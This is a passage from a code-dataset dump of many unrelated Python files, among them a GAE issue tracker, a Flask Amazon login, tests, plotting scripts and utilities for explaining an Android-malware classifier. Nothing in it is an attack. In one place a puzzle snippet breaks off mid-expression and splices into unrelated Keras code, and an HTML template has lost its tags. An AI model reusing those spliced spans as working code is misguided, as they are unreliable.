i+1","sub_path":"Bloomberg/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"462903838","text":"from IPython.display import display_html\nfrom textwrap import dedent\n\n\nclass JignaNotebook(object):\n def __init__(self, port=9999):\n self.server_thread = None\n self.port = port\n self._code_count = 0\n\n def start_server(self):\n from jigna.api import View\n view = View(body_html='')\n self.view = view\n from threading import Thread\n t = Thread(target=lambda: view.serve(port=self.port))\n t.daemon = True\n t.start()\n self.server_thread = t\n\n def add_models(self, **context):\n self.view.update_context(**context)\n\n def get_ipython_html(self, body_html):\n server = \"localhost:%d\"%self.port\n div_id = 'injected%d'%self._code_count\n self._code_count += 1\n src = dedent(\"\"\"\n
\n {body_html}\n
\n \n \"\"\".format(div_id=div_id, body_html=body_html, server=server))\n return src\n\n def show(self, body_html, **context):\n if len(context) > 0:\n self.add_models(**context)\n return display_html(self.get_ipython_html(body_html), raw=True)\n\n\n\ndef main():\n from IPython.frontend.html.notebook.notebookapp import NotebookApp\n app = NotebookApp()\n app.initialize()\n app.start()\n\nif __name__ == '__main__':\n main()\nelse:\n jigna_nb = JignaNotebook()\n jigna_nb.start_server()\n show = jigna_nb.show\n","sub_path":"examples/notebook/jigna_notebook.py","file_name":"jigna_notebook.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"237185774","text":"#!/usr/bin/env python3\n\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport os\nfrom setuptools import setup, find_packages\n\n\n# Pull out all dependencies in requirements.txt for the batchkit library only.\nrootdir = os.path.dirname(os.path.realpath(__file__))\nwith open(os.path.join(rootdir, 'requirements.txt')) as reqs:\n required = reqs.read().splitlines()\ndeps = []\ntoggle = False\nfor line in required:\n if \"### batchkit\" in line:\n toggle = True\n continue\n elif \"###\" in line:\n toggle = False\n elif len(line) > 0 and line[0] != \"#\" and toggle:\n deps.append(line)\n\n\n# Package specification for batchkit library.\nsetup(\n name='batchkit',\n version='0.9.0',\n author='Microsoft Azure',\n author_email='andwald@microsoft.com',\n url='https://github.com/microsoft/batch-processing-kit',\n packages=[\"batchkit\"],\n install_requires=deps,\n license=\"MIT\",\n scripts=[],\n)\n","sub_path":"setup_batchkit.py","file_name":"setup_batchkit.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"13702792","text":"# encoding=utf-8\n\nimport logging\nimport os\nimport re\n\nfrom google.appengine.dist import use_library\nuse_library('django', '0.96')\n\nfrom django.utils import simplejson\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nimport issues\nimport model\n\nDEFAULT_ACTION = 'table'\n\n\ndef parse_labels(labels):\n labels = list(set(re.split('[, ]+', labels)))\n return sorted([l for l in labels if l])\n\n\nclass Action:\n def __init__(self, rh):\n self.rh = rh\n\n def render(self, data):\n self.rh.render(self.template, data)\n\n\nclass SubmitAction(Action):\n template = 'submit.tpl'\n\n def get(self):\n issue = self.get_issue()\n if self.rh.request.get('labels'):\n issue.labels.append(self.rh.request.get('labels'))\n self.render({\n 'issue': issue,\n })\n\n def post(self):\n data = dict([(x, self.rh.request.get(x)) for x in self.rh.request.arguments()])\n if 'labels' in data:\n data['labels'] = parse_labels(data['labels'])\n if not data.get('id'):\n user = users.get_current_user()\n if user:\n data['author'] = user.email()\n issue = issues.update(data)\n self.rh.redirect(self.rh.request.path + '?action=' + DEFAULT_ACTION)\n #self.rh.redirect(self.rh.request.path + '?action=view&id=' + str(issue.id))\n\n def get_issue(self):\n issue = model.TrackerIssue()\n issue.labels = [ 'Open' ]\n user = users.get_current_user()\n if user is not None:\n issue.author = user\n issue.owner = user\n return issue\n\n\nclass EditAction(SubmitAction):\n template = 'edit.tpl'\n\n def get_issue(self):\n issue_id = int(self.rh.request.get('id'))\n issue = model.TrackerIssue.gql('WHERE id = :1', issue_id).get()\n if issue is None:\n raise Exception('Issue %u does not exist.' % issue_id)\n return issue\n\n\nclass ViewAction(Action):\n template = 'view.tpl'\n\n def get(self):\n issue_id = int(self.rh.request.get('id'))\n issue = issues.get_issue_by_id(issue_id)\n self.render({\n 'issue': issue,\n 'labels': sorted(issue.labels, key=lambda l: ('-' not in l, l.lower())),\n 'resolved': 'Closed' in issue.labels,\n 'comments': model.TrackerIssueComment.gql('WHERE issue_id = :1 ORDER BY date_created', issue_id).fetch(100),\n })\n\n\nclass CommentAction(Action):\n def post(self):\n labels = parse_labels(self.rh.request.get('labels'))\n\n for l in ('Open', 'Closed'):\n if l in labels:\n labels.remove(l)\n\n if self.rh.request.get('resolved'):\n labels.append('Closed')\n else:\n labels.append('Open')\n\n issue_id = int(self.rh.request.get('id', '0'))\n issues.add_comment(issue_id, users.get_current_user(), self.rh.request.get('text'), labels=labels)\n self.rh.redirect(self.rh.request.path + '?action=view&id=' + str(issue_id))\n\n\nclass ListAction(Action):\n template = 'list.tpl'\n\n def get(self):\n label = self.rh.request.get('label')\n issues_ = issues.find_issues(label, closed=self.rh.request.get('closed'))\n\n self.render({\n 'issues': issues_,\n 'filter': label,\n 'columns': self.get_columns(issues_),\n })\n\n def get_columns(self, issues):\n columns = []\n for issue in issues:\n for label in issue.labels:\n if '-' in label:\n k, v = label.split('-', 1)\n if k not in columns:\n columns.append(k)\n return sorted(columns)\n\n\nclass TableAction(ListAction):\n template = 'table.tpl'\n\n def get(self):\n label = self.rh.request.get('label')\n issues_ = sorted(issues.find_issues(label, closed=self.rh.request.get('closed')), key=lambda i: i.summary.lower())\n\n data = [\n { 'pri': '1', 'title': u'Важно и срочно', 'issues': [] },\n { 'pri': '2', 'title': u'Важно, не срочно', 'issues': [] },\n { 'pri': '3', 'title': u'Срочно, не важно', 'issues': [] },\n { 'pri': '4', 'title': u'Ни срочно, ни важно', 'issues': [] },\n ]\n for issue in issues_:\n pri = [int(l[4:]) for l in issue.labels if l.lower().startswith('pri-')][0]\n if pri >= 1 and pri <= 4:\n data[pri-1]['issues'].append(issue)\n\n self.render({\n 'filter': label,\n 'data': data,\n })\n\n\nclass ExportAction(Action):\n def get(self):\n data = issues.export_json(self.rh.request.get('label') or None)\n self.rh.reply(data)\n\n\nclass ImportAction(Action):\n template = 'import.tpl'\n\n def get(self):\n self.render({ })\n\n def post(self):\n data = simplejson.loads(self.rh.request.get('dump'))\n issues.import_all(data)\n self.rh.redirect(self.rh.request.path)\n\n\nclass ImportOneAction(Action):\n def post(self):\n issue = issues.update(simplejson.loads(self.rh.request.get('data')), create=True)\n logging.info('Issue %u imported.' % issue.id)\n\n\nclass FixPriorityAction(Action):\n def get(self):\n for issue in issues.find_issues():\n labels = list(issue.labels)\n issues.fix_priority_labels(issue)\n if labels != issue.labels:\n issue.put()\n\n\nclass Tracker(webapp.RequestHandler):\n handlers = {\n 'comment': CommentAction,\n 'edit': EditAction,\n 'export': ExportAction,\n 'fixpriority': FixPriorityAction,\n 'import': ImportAction,\n 'import-one': ImportOneAction,\n 'list': ListAction,\n 'submit': SubmitAction,\n 'table': TableAction,\n 'view': ViewAction,\n }\n\n def get(self):\n self.call('get')\n\n def post(self):\n self.call('post')\n\n def call(self, method):\n action = self.request.get('action', DEFAULT_ACTION)\n if action in self.handlers:\n getattr(self.handlers[action](self), method)()\n else:\n self.reply('Don\\'t know how to handle action \"%s\".' % action)\n\n def render(self, template_name, data, content_type='text/html'):\n data['path'] = self.request.path\n data['user'] = users.get_current_user()\n # logging.debug(u'Data for %s: %s' % (template_name, data))\n filename = os.path.join(os.path.dirname(__file__), 'templates', template_name)\n self.reply(template.render(filename, data), content_type=content_type)\n\n def reply(self, content, content_type='text/plain', status=200):\n self.response.headers['Content-Type'] = content_type + '; charset=utf-8'\n self.response.out.write(content)\n\nhandlers = [\n ('.*', Tracker),\n]\n","sub_path":"gaetracker/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"578414353","text":"n = int(input())\ndata = []\nfor i in range(n):\n xy = []\n A = int(input())\n for k in range(A):\n xy.append(list(map(int,input().split())))\n data.append([A,xy])\n\n\nmax_ = 0\nfor bit in range(1<0\n # fx_1 = self.alpha1 * x * K.cast(x > self.theta, K.floatx()) * K.cast(x <= 0.0, K.floatx()) # for theta 0 and len(self.rule) >= 5):\n return True\n else:\n return False\n\n\n def SetPredy(self, predy):\n self.predy = predy\n\n\n def SplitNode(self, newpt):\n pos = int(newpt / BIT)\n val = newpt % BIT\n selindex = np.where(self.dataset[:, pos] == val)[0]\n if len(selindex) == 0:\n return None\n else:\n newrule = self.rule.copy()\n newrule.append(newpt)\n newdataset = self.dataset[selindex].copy()\n NewNode = RuleStructure(newdataset, newrule)\n self.dataset = np.delete(self.dataset, selindex, axis=0)\n self.size = len(self.dataset)\n return NewNode\n\n @property\n def __eq__(self, other):\n return len(self.dataset) == len(other.dataset)\n def __lt__(self, other):\n return -len(self.dataset) < -len(other.dataset)\n\n\ndef ReadData(year = NowYear, IsTrain = True):\n if year != 2019:\n if IsTrain == True:\n f = open(\"data\\\\\" + str(year) + \"\\\\train.pkl\", \"rb\")\n else:\n f = open(\"data\\\\\" + str(year) + \"\\\\test.pkl\", \"rb\")\n data = pickle.load(f)\n f.close()\n x = data[0]\n y = data[1]\n return x, y\n else:\n if IsTrain == True:\n x = np.load(\"../data/2019/x_train.npy\")\n y = np.load(\"../data/2019/y_train.npy\")\n else:\n x = np.load(\"../data/2019/x_test.npy\")\n y = np.load(\"../data/2019/y_test.npy\")\n y = y.reshape([len(y)])\n return x, y\n\ndef loadModel(year = NowYear, fileName = None):\n if fileName == None:\n model = load_model(\"../model/\" + str(year) + \"/MLP_model.h5\")\n else:\n model = load_model(\"../model/\" + fileName)\n return model\n\n\ndef set_acpos(model, ac, index):\n for i in range(len(ac)):\n model.layers[int(index[i])].set_ac(ac[i])\n return model\n\n\ndef getPuppetModel(modelname):\n m = load_model(modelname)\n model = keras.Sequential()\n\n model.add(Dense(50, input_shape=[FEANUMDIC[NowYear]], activation= None))\n model.layers[-1].set_weights(m.layers[0].get_weights())\n model.add(ActivePossible(ac = np.ones([50]))) #############1111111###############\n\n model.add(Dense(50, activation= None))\n model.layers[-1].set_weights(m.layers[3].get_weights())\n model.add(ActivePossible(ac=np.ones([50]))) #############1111111###############\n\n model.add(Dense(1, activation= None))\n model.layers[-1].set_weights(m.layers[6].get_weights())\n\n return model\n\n\ndef getAvailableFeature(year = NowYear):\n f = open(\"rawdata\\\\\" + str(year) + \"\\\\feature_tag.txt\", \"r\", encoding=\"utf8\")\n lines = f.readlines()\n namelist = [0 for _ in range(FEANUMDIC[NowYear])]\n for line in lines:\n for i in range(1, 10):\n if line[-i] == ':':\n break\n name = line[0: -i]\n num = int(line[-i + 1: len(line)])\n namelist[num] = name\n f.close()\n return set([2*i for i in range(len(namelist)) if namelist[i] != 0]).union([2*i+1 for i in range(len(namelist)) if namelist[i] != 0])\n\n\n\ndef getNameList(year = NowYear):\n f = open(\"rawdata\\\\\" + str(year) + \"\\\\feature_tag.txt\", \"r\", encoding=\"utf8\")\n lines = f.readlines()\n namelist = [0 for _ in range(FEANUMDIC[NowYear])]\n for line in lines:\n for i in range(1, 10):\n if line[-i] == ':':\n break\n name = line[0 : -i]\n num = int(line[-i+1 : len(line)])\n namelist[num] = name\n f.close()\n for i in range(FEANUMDIC[NowYear]):\n if namelist[i] == 0:\n namelist[i] = \"*******************************\"\n return namelist\n\n\ndef getActiveNode(lay_0, lay_3,seed):\n dataNum = len(seed)\n activationNode = np.zeros([dataNum, 100])\n activationNode[:, 0 : 50] = \\\n lay_0.predict(seed, batch_size= 20000).reshape(dataNum, 50)\n activationNode[:, 50 : 100] = \\\n lay_3.predict(seed, batch_size= 20000).reshape(dataNum, 50)\n return activationNode\n\n\ndef getActivateState(model, x):\n lay_0 = Model(inputs=model.input,\n outputs=model.layers[0].output)\n lay_3 = Model(inputs=model.input,\n outputs=model.layers[3].output)\n\n activationNode = getActiveNode(lay_0, lay_3, x)\n return activationNode\n\n\ndef calAcStateFromRule(nowrule, model, testNum = 300):\n data = np.random.randint(0, BIT, [testNum, FEANUMDIC[NowYear]])\n for r in nowrule:\n pos = int(r / BIT)\n val = r % BIT\n data[:, pos] = val\n acstate = getActivateState(model, data) > 0\n acstate = np.mean(acstate, axis=0)\n return acstate\n\n\ndef calContributionVec(puppetModel, activationPossible):\n activationPossible = activationPossible.reshape([2, 50])\n puppetModel = set_acpos(puppetModel, activationPossible, [1, 3, ])\n contribution = getGradient(puppetModel)\n return contribution[0]\n\n\ndef getGradient(puppetModel):\n output = puppetModel.output\n input = puppetModel.input\n gradients = K.gradients(output, input)[0]\n\n out = K.function([input], [gradients])\n x = np.zeros([1, FEANUMDIC[NowYear]])\n y = out([x])[0]\n return y\n\n\ndef calPredy(contributionVec, rule, puppetModel, mean_vec):\n base = np.zeros([1, FEANUMDIC[NowYear]])\n base = puppetModel.predict(base)\n y = np.sum(base)\n rulepos = []\n for r in rule:\n rulepos.append(int(r / BIT))\n\n for i in range(FEANUMDIC[NowYear]):\n if i not in rulepos and mean_vec[i] != 0:\n if contributionVec[i] < 0:\n y += (contributionVec[i] ) * mean_vec[i]\n else:\n y += (contributionVec[i] / BIT) * mean_vec[i]\n for r in rule:\n pos = int(r / BIT)\n val = r % BIT\n if val == 1:\n y += contributionVec[pos]\n # else:\n # y -= contributionVec[pos]\n return y\n\n\ndef PlotName(RuleSet):\n name = getNameList(year = 2011)\n for rule in RuleSet:\n for r in rule:\n print(name[r[0]], r[1])\n print(\"#######################\")\n return 0\n\n\ndef readRuleSetfromTXT(filename):\n RuleSet = []\n f = open(filename, 'r')\n StrSet = f.readlines()\n f.close()\n for strrule in StrSet:\n strrule = strrule[0:-2]\n rule = strrule.split(\" \")\n for i in range(len(rule)):\n rule[i] = int(rule[i])\n RuleSet.append(rule)\n NewRuleSet = []\n for rule in RuleSet:\n newrule = []\n for r in rule:\n newrule.append([int(r / BIT), r % BIT])\n NewRuleSet.append(newrule)\n return NewRuleSet\n\n\ndef ReadRuleSet(fileName):\n f = open(fileName, \"rb\")\n RuleSet = pickle.load(f)\n f.close()\n return RuleSet\n\n\n\n\ndef transferRuleSet(RuleSet):\n NewRuleSet = []\n for rule in RuleSet:\n newrule = []\n for r in rule:\n newrule.append([int(r / BIT), r % BIT])\n NewRuleSet.append(newrule)\n return NewRuleSet","sub_path":"submissions/functional/denas/Android_malware/Scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"126445673","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pycurl\nimport StringIO\nimport time\n\nfrom pymongo import Connection\nfrom gridfs import GridFS\n\ndef img2db(img, content_type, filename, timestamp):\n db = Connection().gridfs\n fs = GridFS(db)\n oid = fs.put(img, content_type = content_type, filename = filename, timestamp= timestamp)\n return oid\n\ndef GetImg2db(filename, url):\n try:\n crl = pycurl.Curl()\n crl.setopt(pycurl.HTTPGET, 1)\n crl.setopt(pycurl.URL, url)\n data = StringIO.StringIO()\n crl.setopt(pycurl.WRITEFUNCTION, data.write)\n crl.perform()\n img = data.getvalue()\n content_type = crl.getinfo(pycurl.CONTENT_TYPE)\n oid = img2db(img, content_type, filename, int(time.time()))\n return oid\n except:\n\t pass\n\n#url = \"http://thumbnail.image.rakuten.co.jp/@0_mall/pierrot/cabinet/img14/a1203-031544_1.jpg\"\n#filename = \"501a460c41ab101fda561b23\"\n\n#print GetImg(filename, url)\n","sub_path":"module/getimg2db.py","file_name":"getimg2db.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"289631596","text":"import unittest\n\nimport pylidator\nfrom pylidator.exceptions import ContextNotAvailableError\n\nfrom functools import wraps\n\n\ndef child_generator(obj):\n for row in obj.children:\n yield row\n\n\nclass TestObj(object):\n def __init__(self, returns):\n self.it_happened = False\n self.returns = returns\n self.children = []\n\n\n@pylidator.validator(of=\"base_obj\")\ndef validate_parent(obj):\n obj.it_happened = True\n return obj.returns\n\n\n@pylidator.validator(of=\"child_obj\")\ndef validate_child(obj_child):\n obj_child.it_happened = True\n return obj_child.returns\n\n\n@pylidator.validator(of=\"base_obj\", requires=\"constants_service\")\ndef validate_parent_with_constants_service(obj_child, constants_service):\n obj_child.it_happened = True\n return obj_child.returns\n\n\nclass MyContext:\n pass\n\n\ndef _provide_base_obj(base_obj):\n yield base_obj, None\n\n\ndef _provide_child_obj(base_obj):\n for i, c in enumerate(base_obj.children):\n yield c, {\"description\": \"Child {}\".format(i)}\n\n\n_providers = {\"base_obj\": _provide_base_obj, \"child_obj\": _provide_child_obj}\n\n\nclass TestPylidator(unittest.TestCase):\n def test_validator_returns_None_results_in_no_error(self):\n data = TestObj(returns=None)\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n\n self.assertTrue(data.it_happened)\n self.assertEqual([], ret.get_full_results())\n\n def test_validator_returns_string_results_in_error(self):\n data = TestObj(returns=\"failed.\")\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n self.assertTrue(data.it_happened)\n self.assertEqual([{\"level\": \"ERROR\", \"message\": \"failed.\", \"validation_type\": None}], ret.get_full_results())\n\n def test_validator_returns_array_of_strings_results_in_errors(self):\n data = TestObj(returns=[\"error one\", \"error two\"])\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_parent]}, providers=_providers)\n self.assertEqual(\n [\n {\"level\": \"ERROR\", \"message\": \"error one\", \"validation_type\": None},\n {\"level\": \"ERROR\", \"message\": \"error two\", \"validation_type\": None},\n ],\n ret.get_full_results(),\n )\n\n def test_child_validator_returns_string_results_in_error_per_child(self):\n data = TestObj(returns=\"who cares?\")\n\n data.children.append(TestObj(returns=\"hi\"))\n data.children.append(TestObj(returns=[\"there\", \"you\"]))\n data.children.append(TestObj(returns={\"field1\": [\"Error 1\", \"Error 2\"], \"field2\": \"Error 3\"}))\n data.children.append(TestObj(returns=None))\n\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_child]}, providers=_providers)\n import pprint\n\n pprint.pprint(ret.get_full_results())\n self.assertEqual(\n [\n {\"description\": \"Child 0\", \"level\": \"ERROR\", \"message\": \"hi\", \"validation_type\": None},\n {\"description\": \"Child 1\", \"level\": \"ERROR\", \"message\": \"there\", \"validation_type\": None},\n {\"description\": \"Child 1\", \"level\": \"ERROR\", \"message\": \"you\", \"validation_type\": None},\n {\n \"description\": \"Child 2\",\n \"field\": \"field1\",\n \"level\": \"ERROR\",\n \"message\": \"Field1: ['Error 1', 'Error 2']\",\n \"validation_type\": None,\n \"verbose_name\": \"Field1\",\n },\n {\n \"description\": \"Child 2\",\n \"field\": \"field2\",\n \"level\": \"ERROR\",\n \"message\": \"Field2: Error 3\",\n \"validation_type\": None,\n \"verbose_name\": \"Field2\",\n },\n ],\n ret.get_full_results(),\n )\n\n def test_validator_with_constants_service_returns_string_results_in_error(self):\n data = TestObj(returns=\"failed.\")\n cs = MyContext()\n ret = pylidator.validate(\n data,\n {pylidator.ERROR: [validate_parent_with_constants_service]},\n providers=_providers,\n extra_context={\"constants_service\": cs},\n )\n self.assertTrue(data.it_happened)\n self.assertEqual([{\"level\": \"ERROR\", \"message\": \"failed.\", \"validation_type\": None}], ret.get_full_results())\n\n def test_validator_requesting_unavailable_context_throws(self):\n data = TestObj(returns=\"failed.\")\n cs = MyContext()\n with self.assertRaises(ContextNotAvailableError):\n ret = pylidator.validate(\n data,\n {pylidator.ERROR: [validate_parent_with_constants_service]},\n providers=_providers,\n extra_context={\"not_constants_service\": cs},\n )\n","sub_path":"pylidator/tests/pylidator_test.py","file_name":"pylidator_test.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"550678324","text":"#!/usr/bin/env python\n# -*- coding: utf-8; mode: python; -*-\n\n\"\"\"Module providing abstract interface class for Wang sense classification.\n\nAttributes:\n WangBaseSenser (class):\n abstract class defining interface for explicit and implicit classifier\n\n\"\"\"\n\n##################################################################\n# Imports\nfrom __future__ import absolute_import, print_function\n\nfrom dsenser.base import BaseSenser\nfrom dsenser.constants import SENSE\n\nimport abc\nimport numpy as np\n\n\n##################################################################\n# Class\nclass WangBaseSenser(BaseSenser):\n \"\"\"Abstract class for disambiguating relation senses.\n\n Attributes:\n n_y (int): number of distinct classes\n\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def train(self, a_train_data, a_dev_data=None, a_n_y=-1,\n a_i=-1, a_train_out=None, a_dev_out=None):\n \"\"\"Method for training the model.\n\n Args:\n a_train_data (2-tuple(list, dict)):\n list of training JSON data\n a_dev_data (2-tuple(list, dict) or None):\n list of development JSON data\n a_n_y (int):\n number of distinct classes\n a_i (int):\n row index for the output predictions\n a_train_out (np.array or None):\n predictions for the training set\n a_dev_out (np.array or None):\n predictions for the training set\n\n Returns:\n void:\n\n Note:\n updates ``a_train_out`` and ``a_dev_out`` in place\n\n \"\"\"\n self.n_y = a_n_y\n x_train, y_train = self._generate_ts(a_train_data)\n x_dev, y_dev = self._generate_ts(a_dev_data)\n # fit the model\n self._model.fit([el[-1] for el in x_train], y_train)\n if a_i >= 0:\n if a_train_out is not None:\n for i, x_i in x_train:\n self._predict(x_i, a_train_out[i], a_i)\n if a_dev_out is not None:\n for i, x_i in x_dev:\n self._predict(x_i, a_dev_out[i], a_i)\n\n def predict(self, a_rel, a_data, a_ret, a_i):\n \"\"\"Method for predicting sense of single relation.\n\n Args:\n a_rel (dict):\n discourse relation whose sense should be predicted\n a_data (2-tuple(dict, dict)):\n list of input JSON data\n a_ret (np.array):\n output prediction vector\n a_i (int):\n row index in the output vector\n\n Returns:\n void:\n\n Note:\n updates ``a_ret[a_i]`` in place\n\n \"\"\"\n feats = self._extract_features(a_rel, a_data[-1])\n self._predict(feats, a_ret, a_i)\n\n @abc.abstractmethod\n def _extract_features(self, a_rel, a_parses):\n \"\"\"Extract classification features for a given relation.\n\n Args:\n a_rel (dict):\n discourse relation to extract features for\n a_parses (dict):\n parsed sentences\n\n Returns:\n void:\n\n \"\"\"\n raise NotImplementedError\n\n def _predict(self, a_feats, a_ret, a_i):\n \"\"\"Method for predicting sense of single relation.\n\n Args:\n a_feats (dict):\n features of the input instance\n a_ret (np.array):\n output prediction vector\n a_i (int):\n row index in the output vector\n\n Returns:\n void:\n updates ``a_ret[a_i]`` in place\n\n \"\"\"\n # obtain model's estimates\n dec = self._model.decision_function(a_feats)\n if len(dec.shape) > 1:\n dec = np.mean(dec, axis=0)\n # normalize using softmax\n exp_ret = np.exp(sum(dec)) or 1e10\n dec /= exp_ret\n # map model's classes to original indices\n for i, ival in enumerate(dec):\n a_ret[a_i][self._model.classes_[i]] += ival\n\n def _free(self):\n \"\"\"Free resources used by the model.\n\n \"\"\"\n self.n_y = -1\n\n def _generate_ts(self, a_data):\n \"\"\"Generate training set.\n\n Args:\n a_data (2-tuple(list, dict)):\n input data (discourse relations and parses)\n\n Returns:\n tuple(list, list):\n lists of input features and expected classes\n\n \"\"\"\n x, y = [], []\n if a_data is None:\n return (x, y)\n x_i = y_i = None\n # generate features\n for i, irel in a_data[0]:\n x_i = self._extract_features(irel, a_data[1])\n if not x_i:\n continue\n x.append((i, x_i))\n y_i = np.argmax(irel[SENSE])\n y.append(y_i)\n return (x, y)\n","sub_path":"dsenser/wang/wangbase.py","file_name":"wangbase.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"365539171","text":"from rest_framework import serializers\n\nfrom .models import Recording, Topic\n\n\nclass TopicSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Topic\n fields = ('id', 'name', 'show', 'publish_status')\n\n\nclass RecordingSerializer(serializers.ModelSerializer):\n class Meta:\n model = Recording\n fields = ('topic', 'user_id', 'file_name')\n","sub_path":"app_recording/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"40473492","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport csv\n\n\ndef get_data(FILENAME):\n vdrain = []\n ichannel = []\n\n with open(FILENAME, 'r') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i==0 : continue\n vdrain.append(5+float(row[0]))\n ichannel.append(-float(row[1]))\n\n return np.array(vdrain), np.array(ichannel)\n\n\ndef early_voltage(FILENAME, limits):\n vdrain_o, ichannel_o = get_data(FILENAME)\n\n data = zip(vdrain_o, ichannel_o)\n data = [ i for i in data if i[0] > limits[0] and i[0] < limits[1] ]\n\n vdrain = [i[0] for i in data]\n ichannel = [i[1] for i in data]\n\n\n fit = np.polyfit(vdrain, ichannel, 1)\n \n v_early = 1/ (fit[0]) * fit[1]\n print(1/fit[0])\n print(fit[1])\n #print(-v_early)\n\n return fit[1], -v_early\n\n #plt.figure()\n #plt.semilogy(vdrain_o, ichannel_o)\n #plt.semilogy(vdrain, ichannel)\n \n\n\nif __name__ == \"__main__\":\n\n i_sat0, v_early0 = early_voltage(\"../data/experiment3_pmos_weak_4.csv\", [ 3.4, 4.8 ])\n i_sat1, v_early1 = early_voltage(\"../data/experiment3_pmos_moderate_3.csv\", [ 3.4, 4.8 ])\n i_sat2, v_early2 = early_voltage(\"../data/experiment3_pmos_strong_4.csv\", [ 0, 2 ])\n\n plt.semilogx(i_sat0, v_early0, 'X', label=\"Weak Inversion\")\n plt.semilogx(i_sat1, v_early1, 'X', label=\"Moderate Inversion\")\n plt.semilogx(i_sat2, v_early2, 'X', label=\"Strong Inversion\")\n\n plt.title(\"pMOS Early Voltage\")\n plt.ylabel(\"Early Voltage (V)\")\n plt.xlabel(\"$I_{sat}$ (A)\")\n plt.legend()\n plt.show()\n","sub_path":"lab5/plottingScripts/plotting3_pmos_early.py","file_name":"plotting3_pmos_early.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"4690673","text":"import logging\n\nimport requests\nfrom flask import Blueprint\nfrom flask import flash, g, redirect, render_template, request, session, url_for, current_app\nfrom flask import logging as flask_logging\n\nfrom . import db\nfrom .common import AMAZON_PROFILE_REQUEST, AMAZON_TOKEN_REQUEST\nfrom .common import load_logged_in_user, login_required, generate_uuid as _uuid\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.addHandler(flask_logging.default_handler)\n_LOGGER.setLevel(logging.DEBUG)\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\n\n@bp.before_app_request\ndef before_app_request():\n load_logged_in_user()\n\n\n@bp.route('/')\ndef thing_index():\n return redirect(url_for('user.profile'))\n\n\n@bp.route('/login')\ndef login():\n return render_template('user/login.html')\n\n\n@bp.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('user.login'))\n\n\n@bp.route('/handle_login')\ndef handle_login():\n request_args = request.args\n if 'error' in request_args:\n _LOGGER.debug('%s: %s', request_args['error'], request_args['error_description'])\n error = request_args['error_description']\n elif 'code' in request_args:\n code = request_args['code'],\n\n auth_code_response = requests.post(AMAZON_TOKEN_REQUEST, data={\n 'grant_type': 'authorization_code',\n 'code': code,\n 'redirect_uri': url_for('user.handle_login', _external=True, _scheme='https'),\n 'client_id': current_app.config['AMAZON_CLIENT_ID'],\n 'client_secret': current_app.config['AMAZON_CLIENT_SECRET']\n })\n auth_code_json = auth_code_response.json()\n\n if auth_code_response.status_code != 200:\n _LOGGER.debug('%s: %s', auth_code_json['error'], auth_code_json['error_description'])\n error = auth_code_json['error_description']\n else:\n auth_code_json = auth_code_response.json()\n access_token = auth_code_json['access_token']\n\n profile_response = requests.get(AMAZON_PROFILE_REQUEST.format(access_token))\n profile_json = profile_response.json()\n\n if profile_response.status_code != 200:\n _LOGGER.debug('%s: %s', profile_json['error'], profile_json['error_description'])\n error = profile_json['error_description']\n else:\n amazon_id = profile_json['user_id']\n email = profile_json['email']\n\n user_id = db.create_or_update_user(email, amazon_id)\n\n session.clear()\n session['user_id'] = user_id\n return redirect(url_for('user.profile'))\n\n else:\n error = 'Unknown response from Amazon: {}'.format(request_args)\n\n flash(error)\n return render_template('user/login.html')\n\n\n@bp.route('/profile', methods=['GET', 'POST'])\n@login_required\ndef profile():\n if request.method == 'POST': # Generate only 'user scope' uuid\n user_id = g.user['id']\n db.update_user_scope_uuid(user_id, _uuid())\n g.user = db.find_user_by_id(user_id) # refresh user with new 'user scope' for request\n return redirect(url_for('user.profile')) # avoid browser asking for re-submit form on refresh action\n\n return render_template('user/profile.html')\n","sub_path":"raspi-cloud-controller/cloud_flask/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"501629807","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), 